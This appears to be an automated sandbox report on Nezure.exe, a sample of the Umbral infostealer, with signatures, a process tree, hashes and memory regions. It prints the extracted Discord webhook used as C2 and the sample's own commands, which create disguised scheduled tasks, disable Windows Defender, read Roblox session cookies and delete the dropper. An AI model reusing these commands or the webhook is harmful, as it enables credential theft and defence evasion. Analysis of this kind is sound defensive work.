Analysis

  • max time kernel
    52s
  • max time network
    45s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-05-2024 21:52

General

  • Target

    Nezure.exe

  • Size

    8.3MB

  • MD5

    4efce9b6099fa6bfc272b5e192fe16cc

  • SHA1

    d5495d7d0593a0258bb50325eb0381cec5decd19

  • SHA256

    185d297d3a204b586f262ce576bc40127b6ea49561b07c7e40c0a2e779df03e1

  • SHA512

    0b81846c316c3790b1d3fd88953d7c9350443d8dd34cbf4311677e5706b59f4e8b0819186f7cb81b980bab88b9aa6802170536d50a989f081b0aacb68f58ca5f

  • SSDEEP

    196608:UB4vMWmmF95vrRoypY2xNS+U1kYLLBGJt4qi5Wh4d3J4jtQG0gIe:UevBn5viETxNS+5OBU4hat0gI

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1244715424420069449/GTIFnC19DnPwT_RfLQ395m4ILCbNzqdjl2fE6jLwJomWdfGuqMipwhUem4c7oUOG5y7l

Signatures

  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Modifies AppInit DLL entries 2 TTPs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 14 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nezure.exe
    "C:\Users\Admin\AppData\Local\Temp\Nezure.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Users\Admin\AppData\Local\Temp\Nezur.exe
      "C:\Users\Admin\AppData\Local\Temp\Nezur.exe"
      2⤵
      • Executes dropped EXE
      PID:2084
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3284
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:240
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Ableton Live" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe"
          4⤵
          • Creates scheduled task(s)
          PID:712
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2400
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:780
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo 5 /tn "Adobe Premiere Pro" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Chrome.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:1860
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:4696
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4444
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:1796
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:3272
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3416
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2600
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:3092
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
        3⤵
          PID:3012
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
            4⤵
            • Creates scheduled task(s)
            PID:1640
        • C:\Windows\SYSTEM32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
          3⤵
            PID:1680
            • C:\Windows\system32\schtasks.exe
              SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
              4⤵
              • Creates scheduled task(s)
              PID:1968
          • C:\Windows\SYSTEM32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
            3⤵
              PID:1284
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                4⤵
                • Creates scheduled task(s)
                PID:780
            • C:\Windows\SYSTEM32\CMD.exe
              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST & exit
              3⤵
                PID:1764
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo -1 /tn "XAMPP" /tr "C:\Users\Admin\Videos\MicrosoftSecurity.exe" /RL HIGHEST
                  4⤵
                  • Creates scheduled task(s)
                  PID:1352
            • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
              "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
              2⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1108
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" csproduct get uuid
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2500
              • C:\Windows\SYSTEM32\attrib.exe
                "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                3⤵
                • Views/modifies file attributes
                PID:4628
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4424
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:728
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2600
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4236
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" os get Caption
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3488
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" computersystem get totalphysicalmemory
                3⤵
                  PID:1664
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic.exe" csproduct get uuid
                  3⤵
                    PID:3956
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2504
                  • C:\Windows\System32\Wbem\wmic.exe
                    "wmic" path win32_VideoController get name
                    3⤵
                    • Detects videocard installed
                    PID:4648
                  • C:\Windows\SYSTEM32\cmd.exe
                    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4636
                    • C:\Windows\system32\PING.EXE
                      ping localhost
                      4⤵
                      • Runs ping.exe
                      PID:2068
              • C:\Windows\system32\wbem\WmiApSrv.exe
                C:\Windows\system32\wbem\WmiApSrv.exe
                1⤵
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                PID:2388

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                Filesize

                2KB

                MD5

                627073ee3ca9676911bee35548eff2b8

                SHA1

                4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                SHA256

                85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                SHA512

                3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                b2f8b5bf54e10ae4d93a2eac002cb497

                SHA1

                eccc3cd33596075bf413e4249c1f2491b1b2a6c7

                SHA256

                44e6afcd4b56b7cbc81c4ce55e62b7ae6f8d44948f2b9cc9a6ee9a9adfdce02d

                SHA512

                58c5911a9b98b94909e627f498f839a55383aa213afd9a837ed1f8543198a79a856baa02373f948bfbb0cfd149e7962e2356cdad6695dc6411840faa09700686

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                944B

                MD5

                05b3cd21c1ec02f04caba773186ee8d0

                SHA1

                39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                SHA256

                911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                SHA512

                e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                948B

                MD5

                87ebe221d639e66210ef10c93e5f83c3

                SHA1

                483a666b82f7b59e2d569f6f331fa3989fe0f526

                SHA256

                9a41c90023823aa68dc48f5d8592910dc2ad1116bf54870a0832aba787990380

                SHA512

                2a1e22894388a79526f39db4fa7c65db92626719337f865eaac39d0bb28dc95726fba62c1f0d659864843a2804bd803fe3dfbc0840421c80ff735192928efcce

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Filesize

                1KB

                MD5

                7332074ae2b01262736b6fbd9e100dac

                SHA1

                22f992165065107cc9417fa4117240d84414a13c

                SHA256

                baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                SHA512

                4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

              • C:\Users\Admin\AppData\Local\Temp\Client.exe

                Filesize

                578KB

                MD5

                1984de1def2a649295eb4683cef7b145

                SHA1

                b3772c1d98f1d18bafd8cf4781f65fc17f20811a

                SHA256

                ad1ca0ede87c65ab25cca6d7899da474b27ee5631e55c21120e857d16b9802b2

                SHA512

                8b64bec1f124bfe5df9e3b8f7fcae5921836604c67e537445c48bcc2b7ac0b71d00fc7c8f8609799577bce4cdf24bed38eb0c23bb537881c74216f416a665a65

              • C:\Users\Admin\AppData\Local\Temp\Nezur.exe

                Filesize

                7.9MB

                MD5

                754c5ad19cb3bc21a58bccf028bc2b86

                SHA1

                66fe0f66d80023b347707248abe6e44e5f9d98ce

                SHA256

                8445e6223a5f1b7f33b0320560b34139ab758006ed4492f581e2b90d3e104f5b

                SHA512

                fdbbfbc10c58e909da664e643bffbe640b4b3242df0da2d5bd40d9691f96ce6cca4c27e166dff7e290b3a5f012b0a3e135e1650bf61a7484253c59cc54177790

              • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

                Filesize

                230KB

                MD5

                9e9bbff99af7ac67d8bd79f854bd569c

                SHA1

                cce432ed7fc4aa23daf8311e2ef3ea2f056c1ca6

                SHA256

                e0465af4219a63f50e3a44f579d27dc9a0188797faf7f614b5f2ecc1d899a24c

                SHA512

                7b70e1cd5b900aa16894c5cd13925f799d59e11fc3113adeeaf4d770e27b4088546f8e21c674d3aed3c13ccc06c04c22a2d54c8286dda28fee77fd0fd1a870b8

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjlebmfj.0m2.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\xdwd.dll

                Filesize

                136KB

                MD5

                16e5a492c9c6ae34c59683be9c51fa31

                SHA1

                97031b41f5c56f371c28ae0d62a2df7d585adaba

                SHA256

                35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

                SHA512

                20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

              • memory/1108-64-0x0000023FD5010000-0x0000023FD5060000-memory.dmp

                Filesize

                320KB

              • memory/1108-99-0x0000023FD4F30000-0x0000023FD4F3A000-memory.dmp

                Filesize

                40KB

              • memory/1108-100-0x0000023FD4F60000-0x0000023FD4F72000-memory.dmp

                Filesize

                72KB

              • memory/1108-34-0x0000023FBA770000-0x0000023FBA7B0000-memory.dmp

                Filesize

                256KB

              • memory/1108-65-0x0000023FD4F10000-0x0000023FD4F2E000-memory.dmp

                Filesize

                120KB

              • memory/1108-63-0x0000023FD4F90000-0x0000023FD5006000-memory.dmp

                Filesize

                472KB

              • memory/2084-35-0x00007FF6AE080000-0x00007FF6AF3D9000-memory.dmp

                Filesize

                19.3MB

              • memory/3284-38-0x00007FF830B90000-0x00007FF831652000-memory.dmp

                Filesize

                10.8MB

              • memory/3284-31-0x0000000000A30000-0x0000000000AC6000-memory.dmp

                Filesize

                600KB

              • memory/3284-191-0x0000000002B90000-0x0000000002B9C000-memory.dmp

                Filesize

                48KB

              • memory/3284-223-0x00007FF830B90000-0x00007FF831652000-memory.dmp

                Filesize

                10.8MB

              • memory/3844-36-0x00007FF830B90000-0x00007FF831652000-memory.dmp

                Filesize

                10.8MB

              • memory/3844-0-0x00007FF830B93000-0x00007FF830B95000-memory.dmp

                Filesize

                8KB

              • memory/3844-3-0x00007FF830B90000-0x00007FF831652000-memory.dmp

                Filesize

                10.8MB

              • memory/3844-1-0x0000000000B00000-0x000000000134C000-memory.dmp

                Filesize

                8.3MB

              • memory/4424-39-0x000001B4A4850000-0x000001B4A4872000-memory.dmp

                Filesize

                136KB